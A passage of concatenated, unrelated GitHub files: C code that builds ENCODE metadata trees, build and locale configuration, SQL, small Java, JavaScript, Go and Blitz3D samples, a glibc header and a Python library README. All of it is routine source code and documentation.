   {"withParent", OPTION_BOOLEAN},
   {"maniFields", OPTION_BOOLEAN},
   {NULL, 0},
};

struct metaNode
/* A node in a metadata tree */
    {
    struct metaNode *next;	/* Next sibling. */
    struct metaNode *children;	/* Children if any */
    struct metaNode *parent;	/* Parent if any */
    char *name;			/* Node's unique symbolic name. */
    struct mdbVar *vars;	/* Variables used if any */
    };

char *mdbVarLookup(struct mdbVar *list, char *var)
/* Return value associated with given var if var is on list, else NULL */
{
struct mdbVar *v;
for (v = list; v != NULL; v = v->next)
    {
    if (sameString(v->var, var))
        return v->val;
    }
return NULL;
}

char *metaLocalVal(struct metaNode *node, char *var)
/* Look up value, not going up to parents. */
{
return mdbVarLookup(node->vars, var);
}

char *metaVal(struct metaNode *node, char *var)
/* Return value of given var, or none if variable isn't defined.
 * Looks first in self, and then in parents. */
{
char *val;
while (node != NULL)
    {
    if ((val = metaLocalVal(node, var)) != NULL)
        return val;
    node = node->parent;
    }
return NULL;
}

struct mdbVar *mdbVarNew(char *var, char *val)
/* Return a new mdbVar. */
{
struct mdbVar *v;
AllocVar(v);
v->var = cloneString(var);
v->val = cloneString(val);
return v;
}

void metaNodeAddVar(struct metaNode *node, char *var, char *val)
/* Add var to node - but only if it is not already present at same value at a higher level */
{
if (val == NULL)
    return;
if (node->parent != NULL && sameOk(metaVal(node->parent, var), val))
    return;	/* Already in parent, we are fine. */
if (metaLocalVal(node, var))
    errAbort("Redefining %s.%s\n", node->name, var);
struct mdbVar *v = mdbVarNew(var, val);
slAddHead(&node->vars, v);
}

void metaNodeAddVarVals(struct metaNode *node, char *varVals)
/* Add string of var=vals to node */
{
if (varVals == NULL)
    return;
struct slPair *pair, *pairList = slPairListFromString(varVals, FALSE);
for (pair = pairList; pair != NULL; pair = pair->next)
    metaNodeAddVar(node, pair->name, pair->val);
}

struct metaNode *metaNodeNew(char *name)
/* Make new but empty and unconnected node. */
{
struct metaNode *meta;
AllocVar(meta);
meta->name = cloneString(name);
return meta;
}

struct metaNode *metaTreeNew(char *name)
/* Make largely empty root node. */
{
return metaNodeNew(name);
}

struct mdbObj *getMdbList(char *database)
/* Get list of metaDb objects for a database. */
{
struct sqlConnection *conn = sqlConnect(database);
struct mdbObj *list = mdbObjsQueryAll(conn, metaTable);
sqlDisconnect(&conn);
return list;
}

struct metaNode *wrapNodeAroundExp(struct encodeExp *exp)
/* Wrap a metaNode around exp, and return it. */
{
struct metaNode *node = metaNodeNew(exp->accession);
metaNodeAddVar(node, "organism", exp->organism);
metaNodeAddVar(node, "lab", exp->lab);
metaNodeAddVar(node, "dataType", exp->dataType);
metaNodeAddVar(node, "cellType", exp->cellType);
metaNodeAddVar(node, "updateTime", exp->updateTime);
metaNodeAddVarVals(node, exp->expVars);
return node;
}

void metaTreeWrite(int level, int minLevel, int maxLevel, boolean isFile, char *parent,
    struct metaNode *node, struct hash *suppress, FILE *f)
/* Write out self and children to file recursively. */
{
if (level >= minLevel && level < maxLevel)
    {
    int indent = (level-minLevel)*3;
    spaceOut(f, indent);
    fprintf(f, "meta %s\n", node->name);
    if (withParent && parent != NULL)
        {
        spaceOut(f, indent);
        fprintf(f, "parent %s\n", parent);
        }
    struct mdbVar *v;
    for (v = node->vars; v != NULL; v = v->next)
        {
        if (!hashLookup(suppress, v->var))
            {
            spaceOut(f, indent);
            fprintf(f, "%s %s\n", v->var, v->val);
            }
        }
    fprintf(f, "\n");
    }
struct metaNode *child;
for (child = node->children; child != NULL; child = child->next)
    metaTreeWrite(level+1, minLevel, maxLevel, isFile, node->name, child, suppress, f);
}

boolean mdbVarRemove(struct mdbVar **pList, char *var)
/* Find given variable in list and remove it.  Returns TRUE if it
 * actually removed it, FALSE if it never found it. */
{
struct mdbVar **ln = pList;
struct mdbVar *v;
for (v = *pList; v != NULL; v = v->next)
    {
    if (sameString(v->var, var))
        {
        *ln = v->next;
        return TRUE;
        }
    ln = &v->next;
    }
return FALSE;
}

void hoistOne(struct metaNode *node, char *var, char *val)
/* We've already determined that var exists and has same value in all children.
 * What we do here is add it to ourselves and remove it from children. */
{
if (mdbVarLookup(node->vars, var))
    mdbVarRemove(&node->vars, var);
metaNodeAddVar(node, var, val);
struct metaNode *child;
for (child = node->children; child != NULL; child = child->next)
    {
    mdbVarRemove(&child->vars, var);
    }
}

struct slName *varsInAnyNode(struct metaNode *nodeList)
/* Return list of variables that are used in any node in list. */
{
struct hash *varHash = hashNew(6);
struct slName *var, *varList = NULL;
struct metaNode *node;
for (node = nodeList; node != NULL; node = node->next)
    {
    struct mdbVar *v;
    for (v = node->vars; v != NULL; v = v->next)
        {
        if (!hashLookup(varHash, v->var))
            {
            var = slNameAddHead(&varList, v->var);
            hashAdd(varHash, var->name, var);
            }
        }
    }
hashFree(&varHash);
return varList;
}

char *allSameVal(char *var, struct metaNode *nodeList)
/* Return value of variable if it exists and is the same in each node on list */
{
char *val = NULL;
struct metaNode *node;
for (node = nodeList; node != NULL; node = node->next)
    {
    char *oneVal = mdbVarLookup(node->vars, var);
    if (oneVal == NULL)
        return NULL;
    if (val == NULL)
        val = oneVal;
    else
        {
        if (!sameString(oneVal, val))
            return NULL;
        }
    }
return val;
}

char *allSameValWithDataMostWithData(char *var, struct metaNode *nodeList, double minProportion)
/* Return variable if all nodes that have it have it set to same value, and
 * most (at least minProportion) have it. */
{
char *val = NULL;
struct metaNode *node;
int nodeCount = 0, dataCount = 0;
for (node = nodeList; node != NULL; node = node->next)
    {
    ++nodeCount;
    char *oneVal = mdbVarLookup(node->vars, var);
    if (oneVal != NULL)
        {
        ++dataCount;
        if (val == NULL)
            val = oneVal;
        else
            {
            if (!sameString(oneVal, val))
                return NULL;
            }
        }
    }
int minDataNeeded = round(nodeCount * minProportion);
if (dataCount < minDataNeeded)
    return NULL;
return val;
}

void metaTreeHoist(struct metaNode *node, struct hash *closeEnoughTags)
/* Move variables that are the same in all children up to parent. */
{
/* Do depth first recursion, but get early return if we're a leaf. */
struct metaNode *child;
if (node->children == NULL)
    return;
for (child = node->children; child != NULL; child = child->next)
    metaTreeHoist(child, closeEnoughTags);

/* Build up list of variables used in any child. */
struct slName *var, *varList = varsInAnyNode(node->children);

/* Go through list and figure out ones that are same in all children. */
for (var = varList; var != NULL; var = var->next)
    {
    char *val;
    double *closeEnough = hashFindVal(closeEnoughTags, var->name);
    if (closeEnough)
        val = allSameValWithDataMostWithData(var->name, node->children, *closeEnough);
    else
        val = allSameVal(var->name, node->children);
    if (val != NULL)
        {
        if (!sameString(var->name, "fileName"))
            hoistOne(node, var->name, val);
        }
    }
}

double *cloneDouble(double x)
/* Return clone of double in dynamic memory */
{
return CloneVar(&x);
}

struct hash *makeCloseEnoughTags()
/* Make double pointer valued hash keyed by tags that only need to be
 * present in most children to be hoisted. */
{
struct hash *closeEnoughTags = hashNew(5);
hashAdd(closeEnoughTags, "organism", cloneDouble(0.8));
hashAdd(closeEnoughTags, "lab", cloneDouble(0.8));
hashAdd(closeEnoughTags, "age", cloneDouble(0.8));
hashAdd(closeEnoughTags, "grant", cloneDouble(0.8));
hashAdd(closeEnoughTags, "dateSubmitted", cloneDouble(0.8));
hashAdd(closeEnoughTags, "dateUnrestricted", cloneDouble(0.8));
hashAdd(closeEnoughTags, "softwareVersion", cloneDouble(0.8));
hashAdd(closeEnoughTags, "control", cloneDouble(0.9));
hashAdd(closeEnoughTags, "geoSampleAccession", cloneDouble(0.7));
return closeEnoughTags;
}

struct hash *makeSuppress()
/* Make a hash full of fields to suppress. */
{
struct hash *suppress = hashNew(4);
hashAdd(suppress, "objType", NULL);	// Inherent in hierarchy or ignored
hashAdd(suppress, "subId", NULL);	// Submission ID not worth carrying forward
hashAdd(suppress, "tableName", NULL);	// We aren't interested in tables, just files
hashAdd(suppress, "project", NULL);	// Always wgEncode
hashAdd(suppress, "expId", NULL);	// Redundant with dccAccession
hashAdd(suppress, "cell", NULL);	// Completely redundant with cellType - I checked
hashAdd(suppress, "sex", NULL);		// This should be implied in cellType
if (!maniFields)
    {
    hashAdd(suppress, "dccAccession", NULL);	// Redundant with meta object name
    hashAdd(suppress, "composite", NULL);	// Inherent in hierarchy now
    hashAdd(suppress, "view", NULL);		// This is in manifest
    hashAdd(suppress, "replicate", NULL);	// This is in manifest
    hashAdd(suppress, "md5sum", NULL);		// Also in manifest
    }
return suppress;
}

boolean originalData(char *symbol)
/* Return TRUE if it's not just a repackaging. */
{
return (symbol != NULL && !startsWith("wgEncodeAwg", symbol) && !startsWith("wgEncodeReg", symbol));
}

int metaNodeCmp(const void *va, const void *vb)
// Compare metaNode to sort on var name, case-insensitive.
{
const struct metaNode *a = *((struct metaNode **)va);
const struct metaNode *b = *((struct metaNode **)vb);
return strcasecmp(a->name, b->name);
}

void metaTreeSortChildrenSortTags(struct metaNode *node)
/* Reverse child list recursively and sort tags list. */
{
slSort(&node->vars, mdbVarCmp);
slSort(&node->children, metaNodeCmp);
struct metaNode *child;
for (child = node->children; child != NULL; child = child->next)
    metaTreeSortChildrenSortTags(child);
}

void encode2Meta(char *database, char *manifestIn, char *outMetaRa)
/* encode2Meta - Create meta files.. */
{
int dbIx = stringArrayIx(database, metaDbs, ArraySize(metaDbs));
if (dbIx < 0)
    errAbort("Unrecognized database %s", database);

/* Create a three level meta.ra format file based on hgFixed.encodeExp
 * and database.metaDb tables.  The levels are composite, experiment, file */
struct metaNode *metaTree = metaTreeNew("encode2");

/* Load up the manifest. */
struct encode2Manifest *mi, *miList = encode2ManifestShortLoadAll(manifestIn);
struct hash *miHash = hashNew(18);
for (mi = miList; mi != NULL; mi = mi->next)
    hashAdd(miHash, mi->fileName, mi);
verbose(1, "%d files in %s\n", miHash->elCount, manifestIn);

/* Load up encodeExp info. */
struct sqlConnection *expConn = sqlConnect(expDb);
struct encodeExp *expList = encodeExpLoadByQuery(expConn, "NOSQLINJ select * from encodeExp");
sqlDisconnect(&expConn);
verbose(1, "%d experiments in encodeExp\n", slCount(expList));

struct hash *compositeHash = hashNew(0);

/* Go through each organism database in turn. */
int i;
for (i=0; i<ArraySize(metaDbs); ++i)
    {
    char *db = metaDbs[i];
    if (!sameString(database, db))
        continue;
    verbose(1, "exploring %s\n", db);
    struct mdbObj *mdb, *mdbList = getMdbList(db);
    verbose(1, "%d meta objects in %s\n", slCount(mdbList), db);

    /* Get info on all composites. */
    for (mdb = mdbList; mdb != NULL; mdb = mdb->next)
        {
        char *objType = mdbVarLookup(mdb->vars, "objType");
        if (objType != NULL && sameString(objType, "composite"))
            {
            char compositeName[256];
            safef(compositeName, sizeof(compositeName), "%s", mdb->obj);
            struct metaNode *compositeNode = metaNodeNew(compositeName);
            slAddHead(&metaTree->children, compositeNode);
            compositeNode->parent = metaTree;
            struct mdbVar *v;
            for (v=mdb->vars; v != NULL; v = v->next)
                {
                metaNodeAddVar(compositeNode, v->var, v->val);
                }
            metaNodeAddVar(compositeNode, "assembly", db);
            hashAdd(compositeHash, mdb->obj, compositeNode);
            }
        }

    /* Make up one more for experiments with no composite. */
    char *noCompositeName = "wgEncodeZz";
    struct metaNode *noCompositeNode = metaNodeNew(noCompositeName);
    slAddHead(&metaTree->children, noCompositeNode);
    noCompositeNode->parent = metaTree;
    hashAdd(compositeHash, noCompositeName, noCompositeNode);

    /* Now go through objects trying to tie experiments to composites. */
    struct hash *expToComposite = hashNew(16);
    for (mdb = mdbList; mdb != NULL; mdb = mdb->next)
        {
        char *composite = mdbVarLookup(mdb->vars, "composite");
        if (originalData(composite))
            {
            char *dccAccession = mdbVarLookup(mdb->vars, "dccAccession");
            if (dccAccession != NULL)
                {
                char *oldComposite = hashFindVal(expToComposite, dccAccession);
                if (oldComposite != NULL)
                    {
                    if (!sameString(oldComposite, composite))
                        verbose(2, "%s maps to %s ignoring mapping to %s", dccAccession, oldComposite, composite);
                    }
                else
                    {
                    hashAdd(expToComposite, dccAccession, composite);
                    }
                }
            }
        }

    /* Now get info on all experiments in this organism. */
    struct hash *expHash = hashNew(0);
    struct encodeExp *exp;
    for (exp = expList; exp != NULL; exp = exp->next)
        {
        if (sameString(exp->organism, organisms[i]))
            {
            if (exp->accession != NULL)
                {
                char *composite = hashFindVal(expToComposite, exp->accession);
                struct metaNode *compositeNode;
                if (composite != NULL)
                    {
                    compositeNode = hashMustFindVal(compositeHash, composite);
                    }
                else
                    {
                    compositeNode = noCompositeNode;
                    }
                struct metaNode *expNode = wrapNodeAroundExp(exp);
                hashAdd(expHash, expNode->name, expNode);
                slAddHead(&compositeNode->children, expNode);
                expNode->parent = compositeNode;
                }
            }
        }

    /* Hang file nodes off the experiment nodes they belong to. */
    for (mdb = mdbList; mdb != NULL; mdb = mdb->next)
        {
        char *fileName = NULL, *dccAccession = NULL;
        char *objType = mdbVarLookup(mdb->vars, "objType");
        if (objType != NULL && sameString(objType, "composite"))
            continue;
        dccAccession = mdbVarLookup(mdb->vars, "dccAccession");
        if (dccAccession == NULL)
            continue;
        char *composite = hashFindVal(expToComposite, dccAccession);
        if (composite == NULL)
            errAbort("Can't find composite for %s", mdb->obj);
        struct mdbVar *v;
        for (v = mdb->vars; v != NULL; v = v->next)
            {
            char *var = v->var, *val = v->val;
            if (sameString("fileName", var))
                {
                fileName = val;
                char path[PATH_LEN];
                char *comma = strchr(fileName, ',');
                if (comma != NULL)
                    *comma = 0;		/* Cut off comma separated list. */
                safef(path, sizeof(path), "%s/%s/%s", db, composite, fileName);	 /* Add database path */
                fileName = val = v->val = cloneString(path);
                }
            }
        if (fileName != NULL)
            {
            if (hashLookup(miHash, fileName))
                {
                struct metaNode *expNode = hashFindVal(expHash, dccAccession);
                if (expNode != NULL)
                    {
                    struct metaNode *fileNode = metaNodeNew(mdb->obj);
                    slAddHead(&expNode->children, fileNode);
                    fileNode->parent = expNode;
                    struct mdbVar *v;
                    for (v=mdb->vars; v != NULL; v = v->next)
                        {
                        metaNodeAddVar(fileNode, v->var, v->val);
                        }
                    }
                }
            }
        }
#ifdef SOON
#endif /* SOON */
    }

struct hash *suppress = makeSuppress();
struct hash *closeEnoughTags = makeCloseEnoughTags();
metaTreeHoist(metaTree, closeEnoughTags);
metaTreeSortChildrenSortTags(metaTree);
FILE *f = mustOpen(outMetaRa, "w");
struct metaNode *node;
for (node = metaTree->children; node != NULL; node = node->next)
    metaTreeWrite(0, 0, BIGNUM, FALSE, NULL, node, suppress, f);
carefulClose(&f);

/* Write warning about tags in highest parent. */
struct mdbVar *v;
for (v = metaTree->vars; v != NULL; v = v->next)
    verbose(1, "Omitting universal %s %s\n", v->var, v->val);
}

int main(int argc, char *argv[])
/* Process command line. */
{
optionInit(&argc, argv, options);
if (argc != 4)
    usage();
withParent = optionExists("withParent");
maniFields = optionExists("maniFields");
encode2Meta(argv[1], argv[2], argv[3]);
return 0;
}
{ "pile_set_name": "Github" }
TARGET = com_trolltech_qt_sql include(../qtjambi/qtjambi_include.pri) include($$QTJAMBI_CPP/com_trolltech_qt_sql/com_trolltech_qt_sql.pri) # libQtSql.so.4.7.4 is only dependant on libQtCore.so.4 (ensures removal of 'Qt -= gui') QT = core sql
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE ldml SYSTEM "../../common/dtd/ldml.dtd"> <ldml> <identity> <version number="$Revision: 4126 $"/> <generation date="$Date: 2009-05-05 18:33:13 -0500 (Tue, 05 May 2009) $"/> <language type="ka"/> </identity> <rbnf> <rulesetGrouping type="SpelloutRules"> <ruleset type="spellout-numbering-year"> <rbnfrule value="x.x">=#,###0.#=;</rbnfrule> <rbnfrule value="0">=%spellout-numbering=;</rbnfrule> </ruleset> <ruleset type="spellout-numbering"> <rbnfrule value="0">=%spellout-cardinal=;</rbnfrule> </ruleset> <ruleset type="spellout-cardinal"> <rbnfrule value="-x">მინუს →→;</rbnfrule> <rbnfrule value="x.x">←← მძიმე →→;</rbnfrule> <rbnfrule value="0">ნული;</rbnfrule> <rbnfrule value="1">ერთი;</rbnfrule> <rbnfrule value="2">ორი;</rbnfrule> <rbnfrule value="3">სამი;</rbnfrule> <rbnfrule value="4">ოთხი;</rbnfrule> <rbnfrule value="5">ხუთი;</rbnfrule> <rbnfrule value="6">ექვსი;</rbnfrule> <rbnfrule value="7">შვიდი;</rbnfrule> <rbnfrule value="8">რვა;</rbnfrule> <rbnfrule value="9">ცხრა;</rbnfrule> <rbnfrule value="10">ათი;</rbnfrule> <rbnfrule value="11">თერთმეტი;</rbnfrule> <rbnfrule value="12">თორმეტი;</rbnfrule> <rbnfrule value="13">ცამეტი;</rbnfrule> <rbnfrule value="14">თოთხმეტი;</rbnfrule> <rbnfrule value="15">თხუთმეტი;</rbnfrule> <rbnfrule value="16">თექვსმეტი;</rbnfrule> <rbnfrule value="17">ჩვიდმეტი;</rbnfrule> <rbnfrule value="18">თრვამეტი;</rbnfrule> <rbnfrule value="19">ცხრამეტი;</rbnfrule> <rbnfrule value="20" radix="20">ოცი;</rbnfrule> <rbnfrule value="21" radix="20">ოცდა­→→;</rbnfrule> <rbnfrule value="40" radix="20">ორმოცი;</rbnfrule> <rbnfrule value="41" radix="20">ორმოცდა­→→;</rbnfrule> <rbnfrule value="60" radix="20">სამოცი;</rbnfrule> <rbnfrule value="61" radix="20">სამოცდა­→→;</rbnfrule> <rbnfrule value="80" radix="20">ოთხმოცი;</rbnfrule> <rbnfrule value="81" radix="20">ოთხმოცდა­→→;</rbnfrule> <rbnfrule value="100">ას→%%hundred→;</rbnfrule> <rbnfrule value="200">ორას→%%hundred→;</rbnfrule> <rbnfrule 
value="300">სამას→%%hundred→;</rbnfrule> <rbnfrule value="400">ოთხას→%%hundred→;</rbnfrule> <rbnfrule value="500">ხუთას→%%hundred→;</rbnfrule> <rbnfrule value="600">ექვსას→%%hundred→;</rbnfrule> <rbnfrule value="700">შვიდას→%%hundred→;</rbnfrule> <rbnfrule value="800">რვაას→%%hundred→;</rbnfrule> <rbnfrule value="900">ცხრაას→%%hundred→;</rbnfrule> <rbnfrule value="1000">ათას→%%th→;</rbnfrule> <rbnfrule value="2000">←← ათას→%%th→;</rbnfrule> <rbnfrule value="1000000">←← მილიონ→%%th→;</rbnfrule> <rbnfrule value="1000000000">←← მილიარდ→%%th→;</rbnfrule> <rbnfrule value="1000000000000">←← ბილიონ→%%th→;</rbnfrule> <rbnfrule value="1000000000000000">←← ბილიარდ→%%th→;</rbnfrule> <rbnfrule value="1000000000000000000">=#,##0=;</rbnfrule> </ruleset> <ruleset type="hundred" access="private"> <rbnfrule value="0">ი;</rbnfrule> <rbnfrule value="1">­=%spellout-cardinal=;</rbnfrule> </ruleset> <ruleset type="th" access="private"> <rbnfrule value="0">ი;</rbnfrule> <rbnfrule value="1">' =%spellout-cardinal=;</rbnfrule> </ruleset> </rulesetGrouping> </rbnf> </ldml>
{ "pile_set_name": "Github" }
CREATE TABLE dimension_date ( id int, dateid int, completedate string, daynumberinweek tinyint, dayfullname string, daynumberinmonth tinyint, daynumberinyear int, weeknumberinyear tinyint, monthnumberinyear tinyint, monthfullname string, quarternumber tinyint, quartername string, yearnumber int, weekstartdate string, weekstartdateid int, monthstartdate string, monthstartdateid int); explain with daily as ( select * from dimension_date where dateid = 20200228 ), weekly as ( select dly.dateid,count(1) as mb_wk from dimension_date dly left join dimension_date wk ON datediff(dly.completedate, wk.completedate) >= 0 AND datediff(dly.completedate, wk.completedate) < 6 GROUP BY dly.dateid ), monthly as ( select dly.dateid,count(1) as nb_monthly from dimension_date dly left join dimension_date wk ON datediff(dly.completedate, wk.completedate) >= 0 AND datediff(dly.completedate, wk.completedate) < 28 GROUP BY dly.dateid ) select daily.dateid,mb_wk,nb_monthly from daily left join weekly on daily.dateid = weekly.dateid left join monthly on daily.dateid = monthly.dateid;
{ "pile_set_name": "Github" }
package com.bage.controller;

/**
 * Read-side repository abstraction for {@code Book} records.
 * Implementations decide the backing store (JPA, in-memory, remote service, ...).
 */
public interface BookRepository {

    /**
     * Looks up a single book by its ISBN.
     *
     * @param isbn the ISBN identifying the book; assumed non-null — TODO confirm with callers
     * @return the matching book — presumably {@code null} when no book matches; verify against implementations
     */
    Book getByIsbn(String isbn);
}
{ "pile_set_name": "Github" }
<html>
<!-- Maintenance/error page template. The contents of this file are sent for error pages.
     {{CODE}} is replaced with a number, {{HOSTNAME}} with the server's host name. -->
<body style="margin: 40px 80px; font-family: 'Arial Black', 'Arial Bold', Gadget, sans-serif; background: #333; color: #ddd;">
  <h1 style="margin-bottom: 0px;">
    {{HOSTNAME}}
  </h1>
  <small style="padding-top: 0px;">
    We'll be back shortly. Check again in about 10 minutes.
  </small>
</body>
<!-- Fix: the original file opened <html> but never closed it; templating
     pipelines and strict parsers choke on the unterminated document. -->
</html>
{ "pile_set_name": "Github" }
/* * Generated by class-dump 3.3.4 (64 bit). * * class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2011 by Steve Nygard. */ #import <CallHistory/CHLogger.h> #import "SyncManagerProtocol-Protocol.h" @class DBHandleManager, NSString, TransactionManager; @interface SyncManager : CHLogger <SyncManagerProtocol> { TransactionManager *_transactionManager; DBHandleManager *_handleManager; } @property(readonly, nonatomic) DBHandleManager *handleManager; // @synthesize handleManager=_handleManager; - (void).cxx_destruct; - (id)archiveCallObject:(id)arg1; - (void)resetTimers; - (double)timerOutgoing; - (double)timerIncoming; - (double)timerLifetime; - (void)addUpdateTransactions:(id)arg1; - (void)updateAllObjects:(id)arg1; - (void)updateObjects:(id)arg1; - (void)deleteObjectsWithLimits:(id)arg1; - (void)deleteAllObjects; - (void)deleteObjectsWithUniqueIds:(id)arg1; - (void)deleteObjectWithUniqueId:(id)arg1; - (id)fetchObjectsWithLimits:(id)arg1; - (id)fetchObjectWithUniqueId:(id)arg1; - (id)fetchAllObjects; - (void)insertWithoutTransaction:(id)arg1; - (void)insert:(id)arg1; - (id)init; // Remaining properties @property(readonly, copy) NSString *debugDescription; @property(readonly, copy) NSString *description; @property(readonly) unsigned long long hash; @property(readonly) Class superclass; @end
{ "pile_set_name": "Github" }
aui-search ========
{ "pile_set_name": "Github" }
; BrushTexture Example
; --------------------
; Demonstrates painting a mesh via a brush: a texture is attached to a
; brush with BrushTexture, then the brush is applied to a cube with
; PaintMesh. The cube can be rotated interactively until ESC quits.

Graphics3D 640,480
SetBuffer BackBuffer()

camera=CreateCamera()

; Directional light rotated to shine down onto the scene
light=CreateLight()
RotateEntity light,90,0,0

; Cube placed in front of the camera (camera sits at the origin)
cube=CreateCube()
PositionEntity cube,0,0,5

; Load texture
tex=LoadTexture( "media/b3dlogo.jpg" )

; Create brush
brush=CreateBrush()

; Apply texture to brush
BrushTexture brush,tex

; Paint mesh with brush
PaintMesh cube,brush

; Main loop — scancode 1 is ESC
While Not KeyDown( 1 )

pitch#=0
yaw#=0
roll#=0

; Scancodes 200/208 = up/down arrows, 203/205 = left/right arrows,
; 44/45 = Z/X — presumably; verify against the Blitz3D scancode table
If KeyDown( 208 )=True Then pitch#=-1
If KeyDown( 200 )=True Then pitch#=1
If KeyDown( 203 )=True Then yaw#=-1
If KeyDown( 205 )=True Then yaw#=1
If KeyDown( 45 )=True Then roll#=-1
If KeyDown( 44 )=True Then roll#=1

; Apply this frame's rotation deltas to the cube
TurnEntity cube,pitch#,yaw#,roll#

RenderWorld
Flip

Wend

End
{ "pile_set_name": "Github" }
package problem0887 func superEggDrop(K, N int) int { moves := 0 dp := [101]int{} // 1 <= K <= 100 // dp[i] = n 表示, i 个鸡蛋,利用 moves 次移动,最多可以检测 n 层楼 for dp[K] < N { for i := K; i > 0; i-- { dp[i] += dp[i-1] + 1 // 以上计算式,是从以下转移方程简化而来 // dp[moves][k] = 1 + dp[moves-1][k-1] + dp[moves-1][k] // 假设 dp[moves-1][k-1] = n0, dp[moves-1][k] = n1 // 首先检测,从第 n0+1 楼丢下鸡蛋会不会破。 // 如果鸡蛋破了,F 一定是在 [1:n0] 楼中, // 利用剩下的 moves-1 次机会和 k-1 个鸡蛋,可以把 F 找出来。 // 如果鸡蛋没破,假如 F 在 [n0+2:n0+n1+1] 楼中 // 利用剩下的 moves-1 次机会和 k 个鸡蛋把,也可以把 F 找出来。 // 所以,当有 moves 个放置机会和 k 个鸡蛋的时候 // F 在 [1, n0+n1+1] 中的任何一楼,都能够被检测出来。 } moves++ } return moves }
{ "pile_set_name": "Github" }
/**
 * Module exports.
 */

module.exports = on;

/**
 * Subscribe `fn` to event `ev` on `obj` and hand back a subscription
 * object whose `destroy()` unregisters the listener again.
 *
 * @param {Object|EventEmitter} obj with `Emitter` mixin or `EventEmitter`
 * @param {String} ev event name
 * @param {Function} fn callback
 * @return {{destroy: Function}} subscription handle
 * @api public
 */
function on(obj, ev, fn) {
  obj.on(ev, fn);
  var subscription = {
    destroy: function destroy() {
      obj.removeListener(ev, fn);
    }
  };
  return subscription;
}
{ "pile_set_name": "Github" }
/* Copyright (C) 2015-2018 Free Software Foundation, Inc. This file is part of the GNU C Library. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with the GNU C Library; if not, see <http://www.gnu.org/licenses/>. */ #include <bits/wordsize.h> #include <kernel-features.h> /* Set error number and return -1. A target may choose to return the internal function, __syscall_error, which sets errno and returns -1. We use -1l, instead of -1, so that it can be casted to (void *). */ #define INLINE_SYSCALL_ERROR_RETURN_VALUE(err) \ ({ \ __set_errno (err); \ -1l; \ }) /* Provide a dummy argument that can be used to force register alignment for register pairs if required by the syscall ABI. */ #ifdef __ASSUME_ALIGNED_REGISTER_PAIRS #define __ALIGNMENT_ARG 0, #define __ALIGNMENT_COUNT(a,b) b #else #define __ALIGNMENT_ARG #define __ALIGNMENT_COUNT(a,b) a #endif /* Provide a common macro to pass 64-bit value on syscalls. */ #if __WORDSIZE == 64 || defined __ASSUME_WORDSIZE64_ILP32 # define SYSCALL_LL(val) (val) # define SYSCALL_LL64(val) (val) #else #define SYSCALL_LL(val) \ __LONG_LONG_PAIR ((val) >> 31, (val)) #define SYSCALL_LL64(val) \ __LONG_LONG_PAIR ((long) ((val) >> 32), (long) ((val) & 0xffffffff)) #endif /* Provide a common macro to pass 64-bit value on pread and pwrite syscalls. 
*/ #ifdef __ASSUME_PRW_DUMMY_ARG # define SYSCALL_LL_PRW(val) 0, SYSCALL_LL (val) # define SYSCALL_LL64_PRW(val) 0, SYSCALL_LL64 (val) #else # define SYSCALL_LL_PRW(val) __ALIGNMENT_ARG SYSCALL_LL (val) # define SYSCALL_LL64_PRW(val) __ALIGNMENT_ARG SYSCALL_LL64 (val) #endif /* Provide a macro to pass the off{64}_t argument on p{readv,writev}{64}. */ #define LO_HI_LONG(val) \ (long) (val), \ (long) (((uint64_t) (val)) >> 32) /* Exports the __send symbol on send.c linux implementation (some ABI have it missing due the usage of a old generic version without it). */ #define HAVE_INTERNAL_SEND_SYMBOL 1
{ "pile_set_name": "Github" }
# Teena: UNIX in Python Teena aims to be a collection of ports of UNIX and Linux syscalls to pure Python, with an emphasis on performance and correctness. Windows support is not a primary concern—I’m initially targeting only POSIX-compliant operating systems. The library uses [Tornado][] to do efficient asynchronous I/O. [tornado]: http://www.tornadoweb.org/ The first version of this library will contain implementations of `tee` and `splice` which operate on files, sockets, and file descriptors. There’s also a `Capture` class which behaves like `StringIO`, but it has a `fileno()` and so can be used where a real file descriptor is needed. ## Example I’ll demonstrate how to capture the result of an HTTP request, whilst efficiently streaming the response to `stderr`. Do the necessary imports: ```pycon >>> from contextlib import closing >>> import teena >>> import os >>> import sys >>> import urllib2 ``` Create a `teena.Capture()` object to capture the output: ```pycon >>> capture = teena.Capture() ``` Open a connection using `urllib2.urlopen()`. This connection object has an associated file descriptor, so you can pass it directly into `tee()`: ```pycon >>> with closing(urllib2.urlopen('http://whatthecommit.com/index.txt')) as conn: ... teena.tee(conn, (sys.stderr, capture.input)) This really should not take 19 minutes to build. 
>>> print repr(capture.getvalue()) 'This really should not take 19 minutes to build.\n' ``` ## Installation pip install teena ## License Copyright (C) 2012 Zachary Voase Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
{ "pile_set_name": "Github" }
